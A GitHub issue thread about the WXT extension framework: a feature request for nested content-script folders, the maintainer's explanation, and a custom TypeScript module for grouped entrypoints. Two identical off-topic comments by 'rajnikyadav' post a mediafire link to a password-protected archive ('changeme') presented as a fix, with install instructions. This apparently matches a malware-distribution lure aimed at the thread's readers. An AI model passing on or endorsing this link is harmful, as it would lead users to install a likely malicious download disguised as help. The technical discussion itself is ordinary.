### ISSUE TITLE
Request for nested content folder structure

### ISSUE THREAD

**Issue by parnavh** [wxt-dev/wxt#937]
### Feature Request

Hey!
I think support for recursive content folders for content scripts would be a great addition, since it will allow grouping of similar content scripts together

Currently:
|Input Pattern|Output Path|
|---| ---|
|`entrypoints/content.[jt]sx?`|`/content-scripts/content.js`|
|`entrypoints/content/index.[jt]sx?`|`/content-scripts/content.js`|
|`entrypoints/<name>.content.[jt]sx?`|`/content-scripts/<name>.js`|
|`entrypoints/<name>.content/index.[jt]sx?`|`/content-scripts/<name>.js`|

Proposed:
|Input Pattern|Output Path|
|---| ---|
|`entrypoints/content.[jt]sx?`|`/content-scripts/content.js`|
|`entrypoints/content/index.[jt]sx?`|`/content-scripts/content.js`|
|`entrypoints/<name>.content.[jt]sx?`|`/content-scripts/<name>.js`|
|`entrypoints/<name>.content/index.[jt]sx?`|`/content-scripts/<name>.js`|
|`entrypoints/<name>.content/<group>/index.[jt]sx?`|`/content-scripts/<name>-<group>.js`|
|`entrypoints/<name>.content/<group>/<subgroup>/index.[jt]sx?`|`/content-scripts/<name>-<group>-<subgroup>.js`|

...and so on

#### Is your feature request related to a bug?

N/A

### What are the alternatives?

- Just continue to use the current folder structure

### Implementation

I am ready to start working on its implementation and update the docs, tests all the fancy stuff!

I just need a heads up from the maintainers if this feature is something that is desired and does not have any downsides in theory like causing conflicts or anything. 

#### Things to do

- Add glob to [src/core/utils/building/find-entrypoints.ts](https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/find-entrypoints.ts#L487)
- Change the naming of the files according to the folder structure

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aklinker1** [comment]
A similar topic has been discussed before: https://github.com/wxt-dev/wxt/issues/192#issuecomment-1875428886

I don't plan on supporting a deep folder structure for the entrypoints directory. However, if you really want to do it, you can use a WXT module to add content scripts manually:

```ts
// modules/additional-entrypoints.ts
import { defineWxtModule, addEntrypoint } from 'wxt/modules';

export default defineWxtModule(async () => {
  addEntrypoint({ ... });
});
```

Unfortunately `addEntrypoint` isn't very user-friendly right now... let me add another hook [here](https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/find-entrypoints.ts#L51-L53) so you can just pass a path and let WXT do the rest.

**Comment by parnavh** [comment]
Oh my bad, I didn't find that issue, I will give it a go and get back

Thank you!

**Comment by parnavh** [comment]
Hey!

I managed to get it working for a single file using this config:

```
// modules/additional-entrypoints.ts
import { defineWxtModule, addEntrypoint } from "wxt/modules";

export default defineWxtModule(async (wxt) => {
  addEntrypoint(wxt, {
    type: "content-script",
    name: "halo",
    inputPath: "absolute-file-path",
    skipped: false,
    outputDir: wxt.config.outDir + "/content-scripts/",
    options: {
      matches: ["*://*.google.com/*"],
    },
  });
});
```

The only caveat being (as per my testing) the config defined in the defineContentScript is not being used and instead these options in the addEntrypoint are being used. I had defined the matches in both scripts but only addEntrypoint had an effect.

Is this the intended effect? If not could you please help me fix this, and if it is the intended effect, do you suggest I create my own loader for these scripts which passes these options?

**Comment by aklinker1** [comment]
@parnavh This is how `addEntrypoint` behaves, see:

> Unfortunately addEntrypoint isn't very user-friendly right now... let me add another hook [here](https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/find-entrypoints.ts#L51-L53) so you can just pass a path and let WXT do the rest.

I'll fix this today

**Comment by parnavh** [comment]
Ok great Thanks!

**Comment by aklinker1** [comment]
> let me add another hook [here](https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/find-entrypoints.ts#L51-L53) so you can just pass a path and let WXT do the rest.

Ran into some problems implementing this that would make the logic to complex IMO. So I'm not adding it.

Instead, I'd recommend prefixing your entrypoints to group them together:

```
entrypoints/<name>-<group>-<subgroup>.content/index.ts
```

This is the standard way of writing a WXT extension. I'd recommend following the standard so other developers can contribute without wondering about a custom setup....

But if you want a custom setup, here you go:

```ts
// modules/custom-entrypoints.ts
import { defineWxtModule } from 'wxt/modules';
import { ContentScriptDefinition, type ContentScriptEntrypoint } from 'wxt';
import glob from 'fast-glob';
import { resolve } from 'node:path';

const GROUP_NAME_REGEX = /(?<name>\w*?)\.content\/(?<group>\w*?)\/index\.\w+$/;
const GROUP_NAME_GLOB = '*.content/*/index.*';

const SUBGROUP_NAME_REGEX =
  /(?<name>\w*?)\.content\/(?<group>\w*?)\/(?<subgroup>\w*?)\/index\.\w+$/;
const SUBGROUP_NAME_GLOB = '*.content/*/*/index.*';

export default defineWxtModule((wxt) => {
  wxt.hook('entrypoints:resolved', async (_, entrypoints) => {
    await addGroups(GROUP_NAME_REGEX, GROUP_NAME_GLOB);
    await addGroups(SUBGROUP_NAME_REGEX, SUBGROUP_NAME_GLOB);

    async function addGroups(nameRegex: RegExp, nameGlob: string) {
      const customPaths = await glob(nameGlob, {
        cwd: wxt.config.entrypointsDir,
        absolute: true,
      });
      const withNames = customPaths.map((path) => {
        const { name, group, subgroup } = path.match(nameRegex)!.groups!;
        return { path, name, group, subgroup };
      });

      const customEntrypoints: ContentScriptEntrypoint[] = [];
      for (const { path, name, group, subgroup } of withNames) {
        const { main: _, ...options } =
          await wxt.builder.importEntrypoint<ContentScriptDefinition>(path);
        customEntrypoints.push({
          type: 'content-script',
          inputPath: path,
          name: `${name}-${group}-${subgroup}`,
          options: options as any,
          outputDir: resolve(wxt.config.outDir, 'content-scripts'),
          skipped: false,
        });
      }
      entrypoints.push(...customEntrypoints);
    }
  });
});

```

**Comment by parnavh** [comment]
Thank you!
